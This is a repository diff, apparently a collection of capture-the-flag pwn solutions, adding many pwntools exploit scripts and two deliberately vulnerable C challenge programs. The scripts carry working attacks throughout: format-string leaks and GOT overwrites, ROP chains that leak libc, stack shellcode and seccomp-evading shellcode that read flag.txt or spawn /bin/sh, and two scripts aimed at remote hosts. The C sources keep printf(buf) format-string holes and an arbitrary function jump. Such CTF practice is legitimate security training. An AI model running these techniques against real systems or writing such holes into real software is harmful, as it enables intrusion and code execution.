r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
s(b"%136$p.%137$p")
|
||||
r.recvuntil(b"Here: ")
|
||||
out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
|
||||
print(out)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,65 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./classroom", checksec=False)
|
||||
libc = target.libc
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendafter(b"> ", a)
|
||||
ss = lambda a: r.send(a)
|
||||
|
||||
# gadgets
|
||||
pop_rdi = lambda a: p64(0x400c43) + p64(a)
|
||||
pop_rsi = lambda a: p64(0x400c41) + p64(a) + p64(0)
|
||||
|
||||
# loop
|
||||
s(b"a")
|
||||
for i in range(4):
|
||||
s(b"y")
|
||||
s(b"a")
|
||||
s(b"y")
|
||||
|
||||
# leak
|
||||
buf = b"A"*136
|
||||
buf += pop_rdi(1)
|
||||
buf += pop_rsi(target.got.write)
|
||||
buf += p64(target.sym.write)
|
||||
buf += pop_rdi(0)
|
||||
buf += pop_rsi(0x60203c)
|
||||
buf += p64(target.sym.read)
|
||||
buf += p64(target.sym.kinder)
|
||||
s(buf)
|
||||
write = u64(r.recv(6).ljust(8, b"\x00"))
|
||||
log.info("write: %#x", write)
|
||||
libc.address = write - libc.sym.write
|
||||
log.info("libc: %#x", libc.address)
|
||||
|
||||
# gadgets
|
||||
jmp_rsi = libc.address + 0x3acf4
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea rdi, [rsp-87]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov rax, 2
|
||||
syscall
|
||||
mov rdi, rax
|
||||
mov rsi, 0x602500
|
||||
mov dl, 0xff
|
||||
mov rax, 0
|
||||
syscall
|
||||
mov rdi, 1
|
||||
mov rax, 1
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc) + b"flag.txt\0"
|
||||
sc += b"A"*(136-len(sc))
|
||||
sc += p64(jmp_rsi)
|
||||
ss(p64(4))
|
||||
s(b"a")
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,69 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
import re
|
||||
|
||||
context.binary = target = ELF("./chal", checksec=False)
|
||||
libc = target.libc
|
||||
|
||||
# bruteforce lower 12 bits
|
||||
def brute():
|
||||
for a in range(1, 256):
|
||||
for b in range(8, 256, 16):
|
||||
r = process(level="error")
|
||||
partial_ret = (a << 8) | b
|
||||
write = (0x61 - (partial_ret & 0xff)) & 0xff
|
||||
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
|
||||
buf += f"%{write}c%48$hhn".encode()
|
||||
r.sendlineafter(b": ", buf)
|
||||
try:
|
||||
r.recvuntil(b"Type")
|
||||
return r, partial_ret
|
||||
except:
|
||||
r.kill()
|
||||
continue
|
||||
|
||||
# leak
|
||||
r, partial_ret = brute()
|
||||
log.info("ret: %#x", partial_ret)
|
||||
buf = f"%97c%48$hhn".encode()
|
||||
buf += b"AAAA%17$p.%19$p"
|
||||
r.sendlineafter(b": ", buf)
|
||||
r.recvuntil(b"AAAA")
|
||||
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
|
||||
libc.address = int(leaks[0], 16) - 0x29d68
|
||||
log.info("libc: %#x", libc.address)
|
||||
target.address = int(leaks[1], 16) - 0x1169
|
||||
log.info("elf: %#x", target.address)
|
||||
|
||||
# write
|
||||
partial_ret = int(hex(libc.sym.system)[-4:], 16)
|
||||
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
|
||||
r.sendline(buf)
|
||||
r.sendline(b"/bin/sh")
|
||||
|
||||
r.interactive()
|
||||
|
||||
"""
|
||||
# write
|
||||
partial_ret = 0xe068
|
||||
write = (0x61 - (partial_ret & 0xff)) & 0xff
|
||||
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
|
||||
buf += f'%{write}c%48$hhn'.encode()
|
||||
s(buf)
|
||||
|
||||
# leak
|
||||
buf = f"%97c%48$hhn".encode()
|
||||
buf += b"AAAA%17$p.%19$p"
|
||||
s(buf)
|
||||
r.recvuntil(b"AAAA")
|
||||
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
|
||||
libc.address = int(leaks[0], 16) - 0x29d68
|
||||
target.address = int(leaks[1], 16) - 0x1169
|
||||
log.info("elf: %#x", target.address)
|
||||
|
||||
# write
|
||||
partial_ret = 0x38f0
|
||||
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
|
||||
r.sendline(buf)
|
||||
"""
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,14 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./hide", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
s(b"%160c%hhn%6$s")
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./vuln", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# leak
|
||||
s(b"%23$p")
|
||||
main = int(r.recvline(), 16)
|
||||
log.info("main: %#x", main)
|
||||
win = main - 0x96
|
||||
log.info("win: %#x", win)
|
||||
|
||||
# jmp
|
||||
s(str(hex(win)).encode())
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,56 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void segfault_handler() {
|
||||
printf("Segfault Occurred, incorrect address.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void call_functions() {
|
||||
char buffer[64];
|
||||
printf("Enter your name:");
|
||||
fgets(buffer, 64, stdin);
|
||||
printf(buffer);
|
||||
|
||||
unsigned long val;
|
||||
printf(" enter the address to jump to, ex => 0x12345: ");
|
||||
scanf("%lx", &val);
|
||||
|
||||
void (*foo)(void) = (void (*)())val;
|
||||
foo();
|
||||
}
|
||||
|
||||
int win() {
|
||||
FILE *fptr;
|
||||
char c;
|
||||
|
||||
printf("You won!\n");
|
||||
// Open file
|
||||
fptr = fopen("flag.txt", "r");
|
||||
if (fptr == NULL)
|
||||
{
|
||||
printf("Cannot open file.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
// Read contents from file
|
||||
c = fgetc(fptr);
|
||||
while (c != EOF)
|
||||
{
|
||||
printf ("%c", c);
|
||||
c = fgetc(fptr);
|
||||
}
|
||||
|
||||
printf("\n");
|
||||
fclose(fptr);
|
||||
}
|
||||
|
||||
int main() {
|
||||
signal(SIGSEGV, segfault_handler);
|
||||
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
|
||||
|
||||
call_functions();
|
||||
return 0;
|
||||
}
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./mad_seccomp", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.send(a)
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea rsi, [rax+108]
|
||||
lea rdx, [rax+200]
|
||||
mov QWORD PTR [rdx], 2
|
||||
mov QWORD PTR [rdx+16], 16
|
||||
mov rax, 437
|
||||
mov rdi, -100
|
||||
mov r10, 24
|
||||
syscall
|
||||
mov rdi, rax
|
||||
mov al, 17
|
||||
lea rsi, [rdx+100]
|
||||
mov rdx, 100
|
||||
sub r10b, r10b
|
||||
syscall
|
||||
lea r11, [rsi]
|
||||
mov QWORD PTR [rsi+100], r11
|
||||
mov QWORD PTR [rsi+108], rax
|
||||
mov rdi, 1
|
||||
lea rsi, [rsi+100]
|
||||
mov rdx, 1
|
||||
mov rax, 20
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
sc += b"flag.txt\0"
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,44 @@
|
||||
#include <sys/syscall.h>
|
||||
#include <stdio.h>
|
||||
#include <linux/openat2.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(void){
|
||||
// get syscall num
|
||||
printf("openat2: %d\n", SYS_openat2);
|
||||
printf("pread64: %d\n", SYS_pread64);
|
||||
printf("writev: %d\n", SYS_writev);
|
||||
|
||||
// struct
|
||||
struct open_how how;
|
||||
memset(&how, 0, sizeof(how));
|
||||
how.flags = O_RDWR;
|
||||
how.resolve = RESOLVE_IN_ROOT;
|
||||
size_t size = sizeof(how);
|
||||
|
||||
// openat2
|
||||
const char *file = "flag.txt";
|
||||
long rax = syscall(SYS_openat2, AT_FDCWD, file, &how, size);
|
||||
printf("fd: %d\n", rax);
|
||||
|
||||
// pread64
|
||||
char buf[64];
|
||||
long rax2 = syscall(SYS_pread64, rax, buf, 100, 0);
|
||||
printf("string size: %d\n", rax2);
|
||||
|
||||
// struct
|
||||
char *str = "Some string here";
|
||||
struct iovec {
|
||||
void *iov_base;
|
||||
size_t iov_len;
|
||||
};
|
||||
struct iovec iov[1];
|
||||
iov[0].iov_base = str;
|
||||
iov[0].iov_len = strlen(str);
|
||||
|
||||
// writev
|
||||
syscall(SYS_writev, 1, iov, 1);
|
||||
return 0;
|
||||
}
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./namelen", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*7
|
||||
buf += b"i"
|
||||
buf += b"A"*(20-len(buf))
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,23 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./chall", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
r.recvuntil(b": ")
|
||||
stack_addr = int(r.recvline(), 16)
|
||||
log.info("stack_addr: %#x", stack_addr)
|
||||
|
||||
# buf
|
||||
sc = asm(shellcraft.sh())
|
||||
sc += b"\x90"*(88-len(sc))
|
||||
buf = sc
|
||||
buf += p64(stack_addr)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,38 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./shellhard", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# stage 1
|
||||
sc = """
|
||||
mov rsi, rdx
|
||||
cqo
|
||||
mov dl, 0xff
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
# stage 2
|
||||
sc = """
|
||||
lea rsi, [rcx+48]
|
||||
mov edi, -100
|
||||
xor rdx, rdx
|
||||
xor r10, r10
|
||||
mov rax, 257
|
||||
syscall
|
||||
mov rsi, rax
|
||||
mov rdi, 1
|
||||
add r10b, 0xff
|
||||
mov rax, 40
|
||||
syscall
|
||||
"""
|
||||
sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./valley", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
ss = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
s(b"%20$p.%21$p")
|
||||
r.recvuntil(b": ")
|
||||
leaks = r.recvlineS().split(".")
|
||||
stack_addr = int(leaks[0], 16) - 0x8
|
||||
log.info("stack_addr: %#x", stack_addr)
|
||||
print_flag = int(leaks[1], 16) - 0x1aa
|
||||
log.info("print_flag: %#x", print_flag)
|
||||
write_bytes = int(str(hex(print_flag))[-4:], 16)
|
||||
fs = f"%{write_bytes}x%8$hnAAAA".encode()
|
||||
|
||||
# write
|
||||
ss(fs+p64(stack_addr))
|
||||
ss(b"exit")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,49 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
void print_flag() {
|
||||
char buf[32];
|
||||
FILE *file = fopen("/home/valley/flag.txt", "r");
|
||||
|
||||
if (file == NULL) {
|
||||
perror("Failed to open flag file");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
fgets(buf, sizeof(buf), file);
|
||||
printf("Congrats! Here is your flag: %s", buf);
|
||||
fclose(file);
|
||||
exit(EXIT_SUCCESS);
|
||||
}
|
||||
|
||||
void echo_valley() {
|
||||
printf("Welcome to the Echo Valley, Try Shouting: \n");
|
||||
|
||||
char buf[100];
|
||||
|
||||
while(1)
|
||||
{
|
||||
fflush(stdout);
|
||||
if (fgets(buf, sizeof(buf), stdin) == NULL) {
|
||||
printf("\nEOF detected. Exiting...\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (strcmp(buf, "exit\n") == 0) {
|
||||
printf("The Valley Disappears\n");
|
||||
break;
|
||||
}
|
||||
|
||||
printf("You heard in the distance: ");
|
||||
printf(buf);
|
||||
fflush(stdout);
|
||||
}
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
int main()
|
||||
{
|
||||
echo_valley();
|
||||
return 0;
|
||||
}
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./voidexec", checksec=False)
|
||||
libc = target.libc
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.send(a)
|
||||
|
||||
# shellcode
|
||||
sc = f"""
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov r9, [rsp+32]
|
||||
sub r9, {libc.sym.__libc_start_call_main+128}
|
||||
mov rdi, r9
|
||||
add rdi, {next(libc.search(b"/bin/sh\0"))}
|
||||
mov r15, r9
|
||||
add r15, {libc.sym.execve}
|
||||
call r15
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./B00fer", checksec=False)
|
||||
# r = process()
|
||||
r = remote("b00fer.niccgetsspooky.xyz", 9001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*40
|
||||
buf += p64(0x401227)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./pwn101", checksec=False)
|
||||
# r = process()
|
||||
r = remote("10.10.110.117", 9001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*60
|
||||
buf += p32(0x1337)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user